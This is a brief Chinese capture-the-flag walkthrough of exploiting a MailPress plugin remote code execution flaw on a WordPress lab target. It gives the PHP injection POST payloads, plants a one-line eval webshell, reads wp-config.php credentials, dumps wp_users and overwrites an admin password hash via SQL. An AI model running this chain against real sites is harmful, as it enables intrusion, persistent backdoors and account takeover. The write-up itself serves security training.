wordpress
由IP地址进入网页 利用wpscan软件扫描该IP地址发现漏洞为Mailpress插件远程代码执行漏洞
Mailpress插件远程代码执行漏洞复现
利用火狐中hackbar插件
-
F12进入 web控制台,把URL写入hackbar中,选中Post data键,传入post值,运行 URL: http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php POST:action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1 -
得到id=34,将id写入下一步的URL中 URL: http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=34 打开此网页 -
再利用php系统函数读取/etc/passwd文件: 选中Post data键,将POST数据中subject的数据改为 <?php file_put_contents('C:/phpstudy123/WWW/eval.php','<?php @eval($_POST["c"]);?>');?>
再次运行 4. 得到id=35,将id写入下一步的URL中 URL: http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=35 打开此网页 一句话木马成功传入
-
打开蚁剑,添加数据 -
添加数据后,右键进入文件管理界面 在www文件夹中找到wp-config.php文件,得到MySQL数据库的用户名及密码 -
返回首页,右键进入数据操作界面,添加配置列表 添加成功后,进入列表即可看到一个flag,点击进入 删除OROER BY 1 DESC LIMIT 0,20;直接执行SELECT * FROM ‘flag’,即可得到flag2 -
进入wp_wordpress列表,可看到wp_users,进入 删除上面同样语句,执行SELECT * from ‘wp_users’,得到网站用户名 -
执行命令: update wp_users set user_pass=‘e10adc3949ba59abbe56e057f20f883e’ where id = 3 将网站密码修改,进入网站,登录 登录进去后在以下选项中依次仔细寻找,flag就藏于其中
到此flag全部查找完全
|